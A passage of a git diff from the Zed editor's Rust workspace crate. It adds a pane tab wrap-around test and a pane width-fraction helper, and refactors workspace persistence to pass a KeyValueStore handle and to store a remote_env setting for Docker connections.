pane.update_in(cx, |pane, _window, _cx| pane.tab_bar_scroll_handle.clone()); + let k_tab_bounds = cx.debug_bounds("TAB-10").unwrap(); + let scroll_bounds = scroll_handle.bounds(); + + assert!( + k_tab_bounds.left() >= scroll_bounds.left(), + "Active tab K should be scrolled into view" + ); + } + #[gpui::test] async fn test_close_all_items_including_pinned(cx: &mut TestAppContext) { init_test(cx); @@ -8258,11 +8690,56 @@ mod tests { ); } + #[gpui::test] + async fn test_activate_item_with_wrap_around(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + add_labeled_item(&pane, "A", false, cx); + add_labeled_item(&pane, "B", false, cx); + add_labeled_item(&pane, "C", false, cx); + assert_item_labels(&pane, ["A", "B", "C*"], cx); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_next_item(&ActivateNextItem { wrap_around: false }, window, cx); + }); + assert_item_labels(&pane, ["A", "B", "C*"], cx); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_next_item(&ActivateNextItem::default(), window, cx); + }); + assert_item_labels(&pane, ["A*", "B", "C"], cx); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_previous_item(&ActivatePreviousItem { wrap_around: false }, window, cx); + }); + assert_item_labels(&pane, ["A*", "B", "C"], cx); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_previous_item(&ActivatePreviousItem::default(), window, cx); + }); + assert_item_labels(&pane, ["A", "B", "C*"], cx); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_previous_item(&ActivatePreviousItem { wrap_around: false }, window, cx); + }); + assert_item_labels(&pane, ["A", "B*", "C"], cx); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_next_item(&ActivateNextItem { wrap_around: false }, window, cx); + }); + assert_item_labels(&pane, ["A", "B", "C*"], cx); + } + fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(LoadThemes::JustBase, cx); + theme_settings::init(LoadThemes::JustBase, cx); }); } diff --git a/crates/workspace/src/pane_group.rs b/crates/workspace/src/pane_group.rs index 0921a19486718c5375ed17ebbb3d7e314546f8d7..c5f78eef6c4a7403589cb4e947326f9fe87ec610 100644 --- a/crates/workspace/src/pane_group.rs +++ b/crates/workspace/src/pane_group.rs @@ -1,6 +1,7 @@ use crate::{ AnyActiveCall, AppState, CollaboratorId, FollowerState, Pane, ParticipantLocation, Workspace, WorkspaceSettings, + notifications::DetachAndPromptErr, pane_group::element::pane_axis, workspace_settings::{PaneSplitDirectionHorizontal, PaneSplitDirectionVertical}, }; @@ -97,6 +98,10 @@ impl PaneGroup { } } + pub fn width_fraction_for_pane(&self, pane: &Entity) -> Option { + self.root.width_fraction_for_pane(pane) + } + pub fn pane_at_pixel_position(&self, coordinate: Point) -> Option<&Entity> { match &self.root { Member::Pane(pane) => Some(pane), @@ -301,6 +306,13 @@ impl Member { }), } } + + fn width_fraction_for_pane(&self, pane: &Entity) -> Option { + match self { + Member::Pane(found) => (found == pane).then_some(1.0), + Member::Axis(axis) => axis.width_fraction_for_pane(pane), + } + } } #[derive(Clone, Copy)] @@ -427,14 +439,19 @@ impl PaneLeaderDecorator for PaneRenderContext<'_> { let app_state = self.app_state.clone(); this.cursor_pointer().on_mouse_down( MouseButton::Left, - move |_, _, cx| { + move |_, window, cx| { crate::join_in_room_project( leader_project_id, leader_user_id, app_state.clone(), cx, ) - .detach_and_log_err(cx); + .detach_and_prompt_err( + "Failed to join project", + window, + cx, + |error, _, _| Some(format!("{error:#}")), + ); }, ) }, @@ -884,6 +901,40 @@ impl PaneAxis { None } + fn width_fraction_for_pane(&self, pane: &Entity) -> Option { + let flexes = self.flexes.lock(); + let total_flex = flexes.iter().copied().sum::(); + + for (index, member) in self.members.iter().enumerate() { + let child_fraction = if total_flex > 0.0 { + flexes[index] / total_flex + } else { + 1.0 / self.members.len() as f32 + }; + + match member { + Member::Pane(found) => { + if found == pane { + return Some(match self.axis { + Axis::Horizontal => child_fraction, + Axis::Vertical => 1.0, + }); + } + } + Member::Axis(axis) => { + if let Some(descendant_fraction) = axis.width_fraction_for_pane(pane) { + return Some(match self.axis { + Axis::Horizontal => child_fraction * descendant_fraction, + Axis::Vertical => descendant_fraction, + }); + } + } + } + } + + None + } + fn render( &self, basis: usize, diff --git a/crates/workspace/src/persistence.rs b/crates/workspace/src/persistence.rs index 492b7a8f385730feaa06dfe3b5e8b4cc0a20bb59..2994e9d0f67d73a30838f922c9b6a0b01b21ed14 100644 --- a/crates/workspace/src/persistence.rs +++ b/crates/workspace/src/persistence.rs @@ -14,7 +14,7 @@ use fs::Fs; use anyhow::{Context as _, Result, bail}; use collections::{HashMap, HashSet, IndexSet}; use db::{ - kvp::KEY_VALUE_STORE, + kvp::KeyValueStore, query, sqlez::{connection::Connection, domain::Domain}, sqlez_macros::sql, @@ -174,8 +174,8 @@ impl Column for SerializedWindowBounds { const DEFAULT_WINDOW_BOUNDS_KEY: &str = "default_window_bounds"; -pub fn read_default_window_bounds() -> Option<(Uuid, WindowBounds)> { - let json_str = KEY_VALUE_STORE +pub fn read_default_window_bounds(kvp: &KeyValueStore) -> Option<(Uuid, WindowBounds)> { + let json_str = kvp .read_kvp(DEFAULT_WINDOW_BOUNDS_KEY) .log_err() .flatten()?; @@ -186,13 +186,13 @@ pub fn read_default_window_bounds() -> Option<(Uuid, WindowBounds)> { } pub async fn write_default_window_bounds( + kvp: &KeyValueStore, bounds: WindowBounds, display_uuid: Uuid, ) -> anyhow::Result<()> { let persisted = WindowBoundsJson::from(bounds); let json_str = serde_json::to_string(&(display_uuid, persisted))?; - KEY_VALUE_STORE - .write_kvp(DEFAULT_WINDOW_BOUNDS_KEY.to_string(), json_str) + kvp.write_kvp(DEFAULT_WINDOW_BOUNDS_KEY.to_string(), json_str) .await?; Ok(()) } @@ -290,12 +290,9 @@ impl From for WindowBounds { } } -fn multi_workspace_states() -> db::kvp::ScopedKeyValueStore<'static> { - KEY_VALUE_STORE.scoped("multi_workspace_state") -} - -fn read_multi_workspace_state(window_id: WindowId) -> model::MultiWorkspaceState { - multi_workspace_states() +fn read_multi_workspace_state(window_id: WindowId, cx: &App) -> model::MultiWorkspaceState { + let kvp = KeyValueStore::global(cx); + kvp.scoped("multi_workspace_state") .read(&window_id.as_u64().to_string()) .log_err() .flatten() @@ -303,9 +300,13 @@ fn read_multi_workspace_state(window_id: WindowId) -> model::MultiWorkspaceState .unwrap_or_default() } -pub async fn write_multi_workspace_state(window_id: WindowId, state: model::MultiWorkspaceState) { +pub async fn write_multi_workspace_state( + kvp: &KeyValueStore, + window_id: WindowId, + state: model::MultiWorkspaceState, +) { if let Ok(json_str) = serde_json::to_string(&state) { - multi_workspace_states() + kvp.scoped("multi_workspace_state") .write(window_id.as_u64().to_string(), json_str) .await .log_err(); @@ -314,6 +315,7 @@ pub async fn write_multi_workspace_state(window_id: WindowId, state: model::Mult pub fn read_serialized_multi_workspaces( session_workspaces: Vec, + cx: &App, ) -> Vec { let mut window_groups: Vec> = Vec::new(); let mut window_id_to_group: HashMap = HashMap::default(); @@ -335,34 +337,38 @@ pub fn read_serialized_multi_workspaces( window_groups .into_iter() - .map(|group| { + .filter_map(|group| { let window_id = group.first().and_then(|sw| sw.window_id); let state = window_id - .map(read_multi_workspace_state) + .map(|wid| read_multi_workspace_state(wid, cx)) .unwrap_or_default(); - model::SerializedMultiWorkspace { - workspaces: group, + let active_workspace = state + .active_workspace_id + .and_then(|id| group.iter().position(|ws| ws.workspace_id == id)) + .or(Some(0)) + .and_then(|index| group.into_iter().nth(index))?; + Some(model::SerializedMultiWorkspace { + active_workspace, state, - } + }) }) .collect() } const DEFAULT_DOCK_STATE_KEY: &str = "default_dock_state"; -pub fn read_default_dock_state() -> Option { - let json_str = KEY_VALUE_STORE - .read_kvp(DEFAULT_DOCK_STATE_KEY) - .log_err() - .flatten()?; +pub fn read_default_dock_state(kvp: &KeyValueStore) -> Option { + let json_str = kvp.read_kvp(DEFAULT_DOCK_STATE_KEY).log_err().flatten()?; serde_json::from_str::(&json_str).ok() } -pub async fn write_default_dock_state(docks: DockStructure) -> anyhow::Result<()> { +pub async fn write_default_dock_state( + kvp: &KeyValueStore, + docks: DockStructure, +) -> anyhow::Result<()> { let json_str = serde_json::to_string(&docks)?; - KEY_VALUE_STORE - .write_kvp(DEFAULT_DOCK_STATE_KEY.to_string(), json_str) + kvp.write_kvp(DEFAULT_DOCK_STATE_KEY.to_string(), json_str) .await?; Ok(()) } @@ -970,6 +976,9 @@ impl Domain for WorkspaceDb { sql!( ALTER TABLE remote_connections ADD COLUMN use_podman BOOLEAN; ), + sql!( + ALTER TABLE remote_connections ADD COLUMN remote_env TEXT; + ), ]; // Allow recovering from bad migration that was initially shipped to nightly @@ -980,7 +989,7 @@ impl Domain for WorkspaceDb { } } -db::static_connection!(DB, WorkspaceDb, []); +db::static_connection!(WorkspaceDb, []); impl WorkspaceDb { /// Returns a serialized workspace for the given worktree_roots. If the passed array @@ -1499,6 +1508,7 @@ impl WorkspaceDb { let mut name = None; let mut container_id = None; let mut use_podman = None; + let mut remote_env = None; match options { RemoteConnectionOptions::Ssh(options) => { kind = RemoteConnectionKind::Ssh; @@ -1517,6 +1527,7 @@ impl WorkspaceDb { name = Some(options.name); use_podman = Some(options.use_podman); user = Some(options.remote_user); + remote_env = serde_json::to_string(&options.remote_env).ok(); } #[cfg(any(test, feature = "test-support"))] RemoteConnectionOptions::Mock(options) => { @@ -1535,6 +1546,7 @@ impl WorkspaceDb { name, container_id, use_podman, + remote_env, ) } @@ -1548,6 +1560,7 @@ impl WorkspaceDb { name: Option, container_id: Option, use_podman: Option, + remote_env: Option, ) -> Result { if let Some(id) = this.select_row_bound(sql!( SELECT id @@ -1581,8 +1594,9 @@ impl WorkspaceDb { distro, name, container_id, - use_podman - ) VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8) + use_podman, + remote_env + ) VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8, ?9) RETURNING id ))?(( kind.serialize(), @@ -1593,6 +1607,7 @@ impl WorkspaceDb { name, container_id, use_podman, + remote_env, ))? .context("failed to insert remote project")?; Ok(RemoteConnectionId(id)) @@ -1694,13 +1709,13 @@ impl WorkspaceDb { fn remote_connections(&self) -> Result> { Ok(self.select(sql!( SELECT - id, kind, host, port, user, distro, container_id, name, use_podman + id, kind, host, port, user, distro, container_id, name, use_podman, remote_env FROM remote_connections ))?()? .into_iter() .filter_map( - |(id, kind, host, port, user, distro, container_id, name, use_podman)| { + |(id, kind, host, port, user, distro, container_id, name, use_podman, remote_env)| { Some(( RemoteConnectionId(id), Self::remote_connection_from_row( @@ -1712,6 +1727,7 @@ impl WorkspaceDb { container_id, name, use_podman, + remote_env, )?, )) }, @@ -1723,9 +1739,9 @@ impl WorkspaceDb { &self, id: RemoteConnectionId, ) -> Result { - let (kind, host, port, user, distro, container_id, name, use_podman) = + let (kind, host, port, user, distro, container_id, name, use_podman, remote_env) = self.select_row_bound(sql!( - SELECT kind, host, port, user, distro, container_id, name, use_podman + SELECT kind, host, port, user, distro, container_id, name, use_podman, remote_env FROM remote_connections WHERE id = ? ))?(id.0)? @@ -1739,6 +1755,7 @@ impl WorkspaceDb { container_id, name, use_podman, + remote_env, ) .context("invalid remote_connection row") } @@ -1752,6 +1769,7 @@ impl WorkspaceDb { container_id: Option, name: Option, use_podman: Option, + remote_env: Option, ) -> Option { match RemoteConnectionKind::deserialize(&kind)? { RemoteConnectionKind::Wsl => Some(RemoteConnectionOptions::Wsl(WslConnectionOptions { @@ -1765,12 +1783,15 @@ impl WorkspaceDb { ..Default::default() })), RemoteConnectionKind::Docker => { + let remote_env: BTreeMap = + serde_json::from_str(&remote_env?).ok()?; Some(RemoteConnectionOptions::Docker(DockerConnectionOptions { container_id: container_id?, name: name?, remote_user: user?, upload_binary_over_docker_exec: false, use_podman: use_podman?, + remote_env, })) } } @@ -1783,11 +1804,17 @@ impl WorkspaceDb { } } - async fn all_paths_exist_with_a_directory(paths: &[PathBuf], fs: &dyn Fs) -> bool { + async fn all_paths_exist_with_a_directory( + paths: &[PathBuf], + fs: &dyn Fs, + timestamp: Option>, + ) -> bool { let mut any_dir = false; for path in paths { match fs.metadata(path).await.ok().flatten() { - None => return false, + None => { + return timestamp.is_some_and(|t| Utc::now() - t < chrono::Duration::days(7)); + } Some(meta) => { if meta.is_dir { any_dir = true; @@ -1843,7 +1870,9 @@ impl WorkspaceDb { // If a local workspace points to WSL, this check will cause us to wait for the // WSL VM and file server to boot up. This can block for many seconds. // Supported scenarios use remote workspaces. - if !has_wsl_path && Self::all_paths_exist_with_a_directory(paths.paths(), fs).await { + if !has_wsl_path + && Self::all_paths_exist_with_a_directory(paths.paths(), fs, Some(timestamp)).await + { result.push((id, SerializedWorkspaceLocation::Local, paths, timestamp)); } else { delete_tasks.push(self.delete_workspace_by_id(id)); @@ -1903,7 +1932,7 @@ impl WorkspaceDb { window_id, }); } else { - if Self::all_paths_exist_with_a_directory(paths.paths(), fs).await { + if Self::all_paths_exist_with_a_directory(paths.paths(), fs, None).await { workspaces.push(SessionWorkspace { workspace_id, location: SerializedWorkspaceLocation::Local, @@ -2244,7 +2273,7 @@ impl WorkspaceDb { use db::sqlez::statement::Statement; use itertools::Itertools as _; - DB.clear_trusted_worktrees() + self.clear_trusted_worktrees() .await .context("clearing previous trust state")?; @@ -2311,7 +2340,7 @@ VALUES {placeholders};"# } pub fn fetch_trusted_worktrees(&self) -> Result { - let trusted_worktrees = DB.trusted_worktrees()?; + let trusted_worktrees = self.trusted_worktrees()?; Ok(trusted_worktrees .into_iter() .filter_map(|(abs_path, user_name, host_name)| { @@ -2350,6 +2379,86 @@ VALUES {placeholders};"# } } +type WorkspaceEntry = ( + WorkspaceId, + SerializedWorkspaceLocation, + PathList, + DateTime, +); + +/// Resolves workspace entries whose paths are git linked worktree checkouts +/// to their main repository paths. +/// +/// For each workspace entry: +/// - If any path is a linked worktree checkout, all worktree paths in that +/// entry are resolved to their main repository paths, producing a new +/// `PathList`. +/// - The resolved entry is then deduplicated against existing entries: if a +/// workspace with the same paths already exists, the entry with the most +/// recent timestamp is kept. +pub async fn resolve_worktree_workspaces( + workspaces: impl IntoIterator, + fs: &dyn Fs, +) -> Vec { + // First pass: resolve worktree paths to main repo paths concurrently. + let resolved = futures::future::join_all(workspaces.into_iter().map(|entry| async move { + let paths = entry.2.paths(); + if paths.is_empty() { + return entry; + } + + // Resolve each path concurrently + let resolved_paths = futures::future::join_all( + paths + .iter() + .map(|path| project::git_store::resolve_git_worktree_to_main_repo(fs, path)), + ) + .await; + + // If no paths were resolved, this entry is not a worktree — keep as-is + if resolved_paths.iter().all(|r| r.is_none()) { + return entry; + } + + // Build new path list, substituting resolved paths + let new_paths: Vec = paths + .iter() + .zip(resolved_paths.iter()) + .map(|(original, resolved)| { + resolved + .as_ref() + .cloned() + .unwrap_or_else(|| original.clone()) + }) + .collect(); + + let new_path_refs: Vec<&Path> = new_paths.iter().map(|p| p.as_path()).collect(); + (entry.0, entry.1, PathList::new(&new_path_refs), entry.3) + })) + .await; + + // Second pass: deduplicate by PathList. + // When two entries resolve to the same paths, keep the one with the + // more recent timestamp. + let mut seen: collections::HashMap, usize> = collections::HashMap::default(); + let mut result: Vec = Vec::new(); + + for entry in resolved { + let key: Vec = entry.2.paths().to_vec(); + if let Some(&existing_idx) = seen.get(&key) { + // Keep the entry with the more recent timestamp + if entry.3 > result[existing_idx].3 { + result[existing_idx] = entry; + } + } else { + seen.insert(key, result.len()); + result.push(entry); + } + } + + result +} + pub fn delete_unloaded_items( alive_items: Vec, workspace_id: WorkspaceId, @@ -2384,23 +2493,34 @@ pub fn delete_unloaded_items( #[cfg(test)] mod tests { use super::*; - use crate::persistence::model::{ - SerializedItem, SerializedPane, SerializedPaneGroup, SerializedWorkspace, SessionWorkspace, + use crate::{ + multi_workspace::MultiWorkspace, + persistence::{ + model::{ + SerializedItem, SerializedPane, SerializedPaneGroup, SerializedWorkspace, + SessionWorkspace, + }, + read_multi_workspace_state, + }, }; - use gpui; + use feature_flags::FeatureFlagAppExt; + use gpui::AppContext as _; use pretty_assertions::assert_eq; + use project::{Project, ProjectGroupKey}; use remote::SshConnectionOptions; use serde_json::json; use std::{thread, time::Duration}; + /// Creates a unique directory in a FakeFs, returning the path. + /// Uses a UUID suffix to avoid collisions with other tests sharing the global DB. + async fn unique_test_dir(fs: &fs::FakeFs, prefix: &str) -> PathBuf { + let dir = PathBuf::from(format!("/test-dirs/{}-{}", prefix, uuid::Uuid::new_v4())); + fs.insert_tree(&dir, json!({})).await; + dir + } + #[gpui::test] async fn test_multi_workspace_serializes_on_add_and_remove(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use crate::persistence::read_multi_workspace_state; - use feature_flags::FeatureFlagAppExt; - use gpui::AppContext as _; - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -2415,6 +2535,10 @@ mod tests { let (multi_workspace, cx) = cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx)); + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + multi_workspace.update_in(cx, |mw, _, cx| { mw.set_random_database_id(cx); }); @@ -2426,7 +2550,7 @@ mod tests { let workspace2 = multi_workspace.update_in(cx, |mw, window, cx| { let workspace = cx.new(|cx| crate::Workspace::test_new(project2.clone(), window, cx)); workspace.update(cx, |ws, _cx| ws.set_random_database_id()); - mw.activate(workspace.clone(), cx); + mw.activate(workspace.clone(), window, cx); workspace }); @@ -2434,7 +2558,7 @@ mod tests { cx.run_until_parked(); // Read back the persisted state and check that the active workspace ID was written. - let state_after_add = read_multi_workspace_state(window_id); + let state_after_add = cx.update(|_, cx| read_multi_workspace_state(window_id, cx)); let active_workspace2_db_id = workspace2.read_with(cx, |ws, _| ws.database_id()); assert_eq!( state_after_add.active_workspace_id, active_workspace2_db_id, @@ -2444,12 +2568,13 @@ mod tests { // --- Remove the second workspace (index 1) --- multi_workspace.update_in(cx, |mw, window, cx| { - mw.remove_workspace(1, window, cx); + let ws = mw.workspaces().nth(1).unwrap().clone(); + mw.remove(&ws, window, cx); }); cx.run_until_parked(); - let state_after_remove = read_multi_workspace_state(window_id); + let state_after_remove = cx.update(|_, cx| read_multi_workspace_state(window_id, cx)); let remaining_db_id = multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id()); assert_eq!( @@ -3866,27 +3991,35 @@ mod tests { } #[gpui::test] - async fn test_read_serialized_multi_workspaces_with_state() { + async fn test_read_serialized_multi_workspaces_with_state(cx: &mut gpui::TestAppContext) { use crate::persistence::model::MultiWorkspaceState; // Write multi-workspace state for two windows via the scoped KVP. let window_10 = WindowId::from(10u64); let window_20 = WindowId::from(20u64); + let kvp = cx.update(|cx| KeyValueStore::global(cx)); + write_multi_workspace_state( + &kvp, window_10, MultiWorkspaceState { active_workspace_id: Some(WorkspaceId(2)), + project_group_keys: vec![], sidebar_open: true, + sidebar_state: None, }, ) .await; write_multi_workspace_state( + &kvp, window_20, MultiWorkspaceState { active_workspace_id: Some(WorkspaceId(3)), + project_group_keys: vec![], sidebar_open: false, + sidebar_state: None, }, ) .await; @@ -3919,37 +4052,32 @@ mod tests { }, ]; - let results = read_serialized_multi_workspaces(session_workspaces); + let results = cx.update(|cx| read_serialized_multi_workspaces(session_workspaces, cx)); - // Should produce 3 groups: window 10, window 20, and the orphan. + // Should produce 3 results: window 10, window 20, and the orphan. assert_eq!(results.len(), 3); - // Window 10 group: 2 workspaces, active_workspace_id = 2, sidebar open. + // Window 10: active_workspace_id = 2 picks workspace 2 (paths /b), sidebar open. let group_10 = &results[0]; - assert_eq!(group_10.workspaces.len(), 2); + assert_eq!(group_10.active_workspace.workspace_id, WorkspaceId(2)); assert_eq!(group_10.state.active_workspace_id, Some(WorkspaceId(2))); assert_eq!(group_10.state.sidebar_open, true); - // Window 20 group: 1 workspace, active_workspace_id = 3, sidebar closed. + // Window 20: active_workspace_id = 3 picks workspace 3 (paths /c), sidebar closed. let group_20 = &results[1]; - assert_eq!(group_20.workspaces.len(), 1); + assert_eq!(group_20.active_workspace.workspace_id, WorkspaceId(3)); assert_eq!(group_20.state.active_workspace_id, Some(WorkspaceId(3))); assert_eq!(group_20.state.sidebar_open, false); - // Orphan group: no window_id, so state is default. + // Orphan: no active_workspace_id, falls back to first workspace (id 4). let group_none = &results[2]; - assert_eq!(group_none.workspaces.len(), 1); + assert_eq!(group_none.active_workspace.workspace_id, WorkspaceId(4)); assert_eq!(group_none.state.active_workspace_id, None); assert_eq!(group_none.state.sidebar_open, false); } #[gpui::test] async fn test_flush_serialization_completes_before_quit(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -3965,14 +4093,16 @@ mod tests { let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + let db = cx.update(|_, cx| WorkspaceDb::global(cx)); + // Assign a database_id so serialization will actually persist. - let workspace_id = DB.next_id().await.unwrap(); + let workspace_id = db.next_id().await.unwrap(); workspace.update(cx, |ws, _cx| { ws.set_database_id(workspace_id); }); // Mutate some workspace state. - DB.set_centered_layout(workspace_id, true).await.unwrap(); + db.set_centered_layout(workspace_id, true).await.unwrap(); // Call flush_serialization and await the returned task directly // (without run_until_parked — the point is that awaiting the task @@ -3984,7 +4114,7 @@ mod tests { task.await; // Read the workspace back from the DB and verify serialization happened. - let serialized = DB.workspace_for_id(workspace_id); + let serialized = db.workspace_for_id(workspace_id); assert!( serialized.is_some(), "flush_serialization should have persisted the workspace to DB" @@ -3992,15 +4122,7 @@ mod tests { } #[gpui::test] - async fn test_create_workspace_serializes_active_workspace_id_after_db_id_assigned( - cx: &mut gpui::TestAppContext, - ) { - use crate::multi_workspace::MultiWorkspace; - use crate::persistence::read_multi_workspace_state; - use feature_flags::FeatureFlagAppExt; - - use project::Project; - + async fn test_create_workspace_serialization(cx: &mut gpui::TestAppContext) { crate::tests::init_test(cx); cx.update(|cx| { @@ -4024,73 +4146,32 @@ mod tests { // Create a new workspace via the MultiWorkspace API (triggers next_id()). multi_workspace.update_in(cx, |mw, window, cx| { - mw.create_workspace(window, cx); + mw.create_test_workspace(window, cx).detach(); }); // Let the async next_id() and re-serialization tasks complete. cx.run_until_parked(); - // Read back the multi-workspace state. - let state = read_multi_workspace_state(window_id); - - // The new workspace should now have a database_id, and the multi-workspace - // state should record it as the active workspace. + // The new workspace should now have a database_id. let new_workspace_db_id = multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id()); assert!( new_workspace_db_id.is_some(), "New workspace should have a database_id after run_until_parked" ); + + // The multi-workspace state should record it as the active workspace. + let state = cx.update(|_, cx| read_multi_workspace_state(window_id, cx)); assert_eq!( state.active_workspace_id, new_workspace_db_id, "Serialized active_workspace_id should match the new workspace's database_id" ); - } - #[gpui::test] - async fn test_create_workspace_individual_serialization(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - - use project::Project; - - crate::tests::init_test(cx); - - cx.update(|cx| { - cx.set_staff(true); - cx.update_flags(true, vec!["agent-v2".to_string()]); - }); - - let fs = fs::FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [], cx).await; - - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); - - multi_workspace.update_in(cx, |mw, _, cx| { - mw.set_random_database_id(cx); - }); - - // Create a new workspace. - multi_workspace.update_in(cx, |mw, window, cx| { - mw.create_workspace(window, cx); - }); - - cx.run_until_parked(); - - // Get the new workspace's database_id. - let new_db_id = - multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id()); - assert!( - new_db_id.is_some(), - "New workspace should have a database_id" - ); - - let workspace_id = new_db_id.unwrap(); - - // The workspace should have been serialized to the DB with real data + // The individual workspace row should exist with real data // (not just the bare DEFAULT VALUES row from next_id). - let serialized = DB.workspace_for_id(workspace_id); + let workspace_id = new_workspace_db_id.unwrap(); + let db = cx.update(|_, cx| WorkspaceDb::global(cx)); + let serialized = db.workspace_for_id(workspace_id); assert!( serialized.is_some(), "Newly created workspace should be fully serialized in the DB after database_id assignment" @@ -4098,12 +4179,7 @@ mod tests { } #[gpui::test] - async fn test_remove_workspace_deletes_db_row(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - use gpui::AppContext as _; - use project::Project; - + async fn test_remove_workspace_clears_session_binding(cx: &mut gpui::TestAppContext) { crate::tests::init_test(cx); cx.update(|cx| { @@ -4112,38 +4188,46 @@ mod tests { }); let fs = fs::FakeFs::new(cx.executor()); + let dir = unique_test_dir(&fs, "remove").await; let project1 = Project::test(fs.clone(), [], cx).await; let project2 = Project::test(fs.clone(), [], cx).await; let (multi_workspace, cx) = cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx)); + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + multi_workspace.update_in(cx, |mw, _, cx| { mw.set_random_database_id(cx); }); + let db = cx.update(|_, cx| WorkspaceDb::global(cx)); + // Get a real DB id for workspace2 so the row actually exists. - let workspace2_db_id = DB.next_id().await.unwrap(); + let workspace2_db_id = db.next_id().await.unwrap(); multi_workspace.update_in(cx, |mw, window, cx| { let workspace = cx.new(|cx| crate::Workspace::test_new(project2.clone(), window, cx)); workspace.update(cx, |ws: &mut crate::Workspace, _cx| { ws.set_database_id(workspace2_db_id) }); - mw.activate(workspace.clone(), cx); + mw.activate(workspace.clone(), window, cx); }); // Save a full workspace row to the DB directly. - DB.save_workspace(SerializedWorkspace { + let session_id = format!("remove-test-session-{}", Uuid::new_v4()); + db.save_workspace(SerializedWorkspace { id: workspace2_db_id, - paths: PathList::new(&["/tmp/remove_test"]), + paths: PathList::new(&[&dir]), location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), display: Default::default(), docks: Default::default(), centered_layout: false, - session_id: Some("remove-test-session".to_owned()), + session_id: Some(session_id.clone()), breakpoints: Default::default(), window_id: Some(99), user_toolchains: Default::default(), @@ -4151,31 +4235,42 @@ mod tests { .await; assert!( - DB.workspace_for_id(workspace2_db_id).is_some(), + db.workspace_for_id(workspace2_db_id).is_some(), "Workspace2 should exist in DB before removal" ); // Remove workspace at index 1 (the second workspace). multi_workspace.update_in(cx, |mw, window, cx| { - mw.remove_workspace(1, window, cx); + let ws = mw.workspaces().nth(1).unwrap().clone(); + mw.remove(&ws, window, cx); }); cx.run_until_parked(); - // The row should be deleted, not just have session_id cleared. + // The row should still exist so it continues to appear in recent + // projects, but the session binding should be cleared so it is not + // restored as part of any future session. assert!( - DB.workspace_for_id(workspace2_db_id).is_none(), - "Removed workspace's DB row should be deleted entirely" + db.workspace_for_id(workspace2_db_id).is_some(), + "Removed workspace's DB row should be preserved for recent projects" + ); + + let session_workspaces = db + .last_session_workspace_locations("remove-test-session", None, fs.as_ref()) + .await + .unwrap(); + let restored_ids: Vec = session_workspaces + .iter() + .map(|sw| sw.workspace_id) + .collect(); + assert!( + !restored_ids.contains(&workspace2_db_id), + "Removed workspace should not appear in session restoration" ); } #[gpui::test] async fn test_remove_workspace_not_restored_as_zombie(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - use gpui::AppContext as _; - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -4192,13 +4287,19 @@ mod tests { let project1 = Project::test(fs.clone(), [], cx).await; let project2 = Project::test(fs.clone(), [], cx).await; + let db = cx.update(|cx| WorkspaceDb::global(cx)); + // Get real DB ids so the rows actually exist. - let ws1_id = DB.next_id().await.unwrap(); - let ws2_id = DB.next_id().await.unwrap(); + let ws1_id = db.next_id().await.unwrap(); + let ws2_id = db.next_id().await.unwrap(); let (multi_workspace, cx) = cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx)); + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + multi_workspace.update_in(cx, |mw, _, cx| { mw.workspace().update(cx, |ws, _cx| { ws.set_database_id(ws1_id); @@ -4210,13 +4311,13 @@ mod tests { workspace.update(cx, |ws: &mut crate::Workspace, _cx| { ws.set_database_id(ws2_id) }); - mw.activate(workspace.clone(), cx); + mw.activate(workspace.clone(), window, cx); }); let session_id = "test-zombie-session"; let window_id_val: u64 = 42; - DB.save_workspace(SerializedWorkspace { + db.save_workspace(SerializedWorkspace { id: ws1_id, paths: PathList::new(&[dir1.path()]), location: SerializedWorkspaceLocation::Local, @@ -4232,7 +4333,7 @@ mod tests { }) .await; - DB.save_workspace(SerializedWorkspace { + db.save_workspace(SerializedWorkspace { id: ws2_id, paths: PathList::new(&[dir2.path()]), location: SerializedWorkspaceLocation::Local, @@ -4250,13 +4351,14 @@ mod tests { // Remove workspace2 (index 1). multi_workspace.update_in(cx, |mw, window, cx| { - mw.remove_workspace(1, window, cx); + let ws = mw.workspaces().nth(1).unwrap().clone(); + mw.remove(&ws, window, cx); }); cx.run_until_parked(); // The removed workspace should NOT appear in session restoration. - let locations = DB + let locations = db .last_session_workspace_locations(session_id, None, fs.as_ref()) .await .unwrap(); @@ -4275,11 +4377,6 @@ mod tests { #[gpui::test] async fn 